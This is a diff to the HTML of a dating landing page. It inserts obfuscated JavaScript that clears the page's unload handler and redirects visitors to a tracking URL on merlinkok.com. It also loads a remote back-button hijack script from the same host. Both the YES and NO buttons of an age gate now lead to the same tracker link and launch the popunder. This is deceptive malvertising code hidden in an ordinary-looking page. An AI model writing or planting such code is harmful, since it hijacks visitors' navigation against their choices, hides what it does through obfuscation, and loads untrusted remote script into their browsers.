--- a/dating/66/index.html
+++ b/dating/66/index.html
@@ -21,6 +21,25 @@
 </head>
 
 <body style="">
+
+<!-- Popunder script -->
+<script type="text/javascript">
+    var _0x47c8=['onbeforeunload'];(function(_0xca98db,_0x14ec84){var _0x11f679=function(_0x16b11c){while(--_0x16b11c){_0xca98db['push'](_0xca98db['shift']());}};_0x11f679(++_0x14ec84);}(_0x47c8,0x7e));var _0x12dd=function(_0xca98db,_0x14ec84){_0xca98db=_0xca98db-0x0;var _0x11f679=_0x47c8[_0xca98db];return _0x11f679;};function exit_a1(){window[_0x12dd('0x0')]=null;}
+  </script>
+    
+  <script>
+    var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.com/secondlink/LP1/indexdating.html?key=nowxkt32ukzgee1gmx5b&c1=popunder&c2=all','assign','open','_blank','HTMLElement'];(function(_0x5b932b,_0x38c322){var _0x552ac9=function(_0x5426b0){while(--_0x5426b0){_0x5b932b['push'](_0x5b932b['shift']());}};_0x552ac9(++_0x38c322);}(_0x19d6,0x136));var _0x1126=function(_0x5b932b,_0x38c322){_0x5b932b=_0x5b932b-0x0;var _0x552ac9=_0x19d6[_0x5b932b];return _0x552ac9;};var isSafari=Object[_0x1126('0x5')]['toString']['call'](window[_0x1126('0x4')])[_0x1126('0x7')](_0x1126('0x6'))>0x0;function launchext(){setTimeout(function(){url=_0x1126('0x0');document[_0x1126('0x8')][_0x1126('0x1')](url);if(isSafari){window[_0x1126('0x2')]('',_0x1126('0x3'));}},0x3e8);return![];}
+  </script>
+    
+<!-- BBR -->
+  <script type="text/javascript" src="https://merlinkok.com/secondlink/LP1/backoffer.js"></script>
+  <script type="text/javascript">
+      (function(w) {
+        w.backOfferUrl = 'https://merlinkok.com/secondlink/LP1/indexdating.html?key=nowxkt32ukzgee1gmx5b&c1=bbr&c2=all'
+      }
+      (window));
+  </script>
+
 	<section class="content">
 		<div class="step">
 			<div class="step__header">
@@ -30,7 +49,7 @@
 				<p style="text-align: center;"><span class="c--blue" style="font-size: 18pt;">Are You Over 18?</span>
 				</p>
 			</div>
-			<div class="step__footer"><a href="#" class="next btn btn--accent"> YES </a><a href="#" class="next btn"> NO </a>
+			<div class="step__footer"><a href="https://binom.blinkgo.top/cgial1k.php?lp=1" class="button" onclick="launchext(); exit_a1();" target="_blank"> YES </a><a href="https://binom.blinkgo.top/cgial1k.php?lp=1" class="button" onclick="launchext(); exit_a1();" target="_blank"> NO </a>
 			</div>
 		</div>
 	</section>
